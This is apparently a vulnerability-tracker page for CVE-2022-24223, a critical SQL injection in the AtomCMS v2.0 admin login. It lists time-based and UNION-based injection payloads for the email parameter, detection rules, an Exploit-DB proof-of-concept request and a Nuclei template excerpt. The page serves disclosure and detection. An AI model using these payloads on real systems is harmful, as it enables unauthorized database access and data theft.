CVE-2022-24223
published 2022-02-01CVE-2022-24223: AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
PriorityP271critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
61.97%
99.1th percentile
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thedigitalcraft | atomcms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}↗
command[email protected]' AND (SELECT 5613 FROM (SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234↗
command[email protected]' UNION ALL SELECT NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL-- -&password=1234↗
- →Detect time-based blind SQLi attempts against /admin/login.php via POST email parameter containing SLEEP() payloads. A response duration >= 5-6 seconds with HTTP 200 is indicative of successful injection. ↗
- →Detect UNION-based SQLi attempts against /admin/login.php via POST email parameter containing UNION ALL SELECT with hex-encoded strings (e.g. 0x717a767a71). ↗
- →Match response body containing both 'Admin Login' and 'Atom.SaveOnBlur' to confirm the target is AtomCMS v2.0 login page, as used in the nuclei template matcher. ↗
- →The vulnerable parameter is 'email' in a POST request to /admin/login.php; the injection vector is AND/UNION appended after a single-quote terminating the email value. ↗
- ·The PoC PHPSESSID cookie value is from a local test environment and is not a meaningful production indicator; session IDs will differ per target. ↗
- ·The UNION-based payload assumes exactly 6 columns in the underlying query; this may vary if the AtomCMS schema differs from the tested v2.0 instance. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AtomCMS v2.0 - SQLi
exploitdb·2022-02-09·CVSS 9.8
CVE-2022-24223 [CRITICAL] AtomCMS v2.0 - SQLi
AtomCMS v2.0 - SQLi
---
# Exploit Title: AtomCMS v2.0 - SQLi
# Date: 08/02/2022
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
# Version: v2.0
# Category: Webapps
# Tested on: Debian linux
# CVE : CVE-2022-24223
# PoC : SQLi :
http://127.0.0.1/Atom.CMS/admin/login.php
POST /Atom.CMS/admin/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/Atom.CMS/admin/login.php
Cookie: PH
Nuclei
Atom CMS v2.0 - SQL Injection
nuclei·CVSS 9.8
CVE-2022-24223 [CRITICAL] Atom CMS v2.0 - SQL Injection
Atom CMS v2.0 - SQL Injection
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
Template:
id: CVE-2022-24223
info:
name: Atom CMS v2.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: Fixed in version Atom CMS v2.1
reference:
- https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
- https://github.com/thedigicraft/Atom.CMS/issues/255
- https://nvd.nist.gov/vuln/detail/CVE-2022-24223
- https://github.com/ARPSy
2022-02-01
Published